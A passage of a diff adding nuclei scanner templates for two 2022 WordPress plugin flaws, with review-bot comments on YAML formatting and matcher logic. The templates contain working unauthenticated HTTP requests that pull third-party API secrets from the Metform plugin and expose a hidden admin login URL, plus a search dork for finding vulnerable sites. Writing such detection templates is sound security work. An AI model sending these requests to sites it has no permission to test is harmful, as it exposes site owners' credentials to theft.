- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
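Review bot: `description:` is a single very long plain scalar, while every other template in this diff uses a `description: |` block scalar; as a plain scalar it is one edit introducing `: ` or ` #` away from a parse error. Convert it to `description: |` with the text wrapped beneath it. The word matcher also has no `part:`, so it scans the whole body for the six hashes — acceptable since 64-hex values are unlikely to collide, but `part: body` would state the intent explicitly.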
|
|
@ -0,0 +1,59 @@
|
|||
id: CVE-2022-1442
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
|
||||
reference:
|
||||
- https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
|
||||
- https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b
|
||||
- https://wordpress.org/plugins/metform/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1442
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-1442
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/metform
|
||||
verified: "true"
|
||||
tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "mf_recaptcha_secret_key"
|
||||
- "admin_email_from"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: id
|
||||
group: 1
|
||||
regex:
|
||||
- '<option value=\"([0-9]+)\"'
|
||||
internal: true
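Review bot: The extractor regex `'<option value=\"([0-9]+)\"'` is a single-quoted YAML scalar, so the `\"` sequences reach the regex engine as backslash-quote; Go's regexp treats that as a literal quote, so it works, but the escapes are unnecessary and suggest double-quoted YAML was intended. `'<option value="([0-9]+)"'` expresses the same pattern plainly. If the first response has no `<option>`, `{{id}}` in the second raw request stays unresolved; how nuclei handles an unresolved variable is not visible here — confirm it skips the request rather than sending the literal placeholder.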
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-1595
|
||||
|
||||
info:
|
||||
name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
|
||||
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
|
||||
classification:
|
||||
cve-id: CVE-2022-1595
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
HEAD /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: valid_login_slug=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Location: ([a-zA-Z0-9_.\\/-]+)"
|
||||
- "wordpress_"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
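Review bot: `classification:` carries only `cve-id`, while every other new template in this diff also fills `cvss-metrics`, `cvss-score` and `cwe-id`; the NVD reference already listed on this file is where those values come from, so the block should not be left partial. The `part: header` regex matcher under `condition: and` also requires the literal `wordpress_` somewhere in the response headers (presumably a Set-Cookie name — confirm), which is worth a comment above the matcher such as `# second pattern anchors on a WordPress cookie so the Location redirect alone does not match`.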
|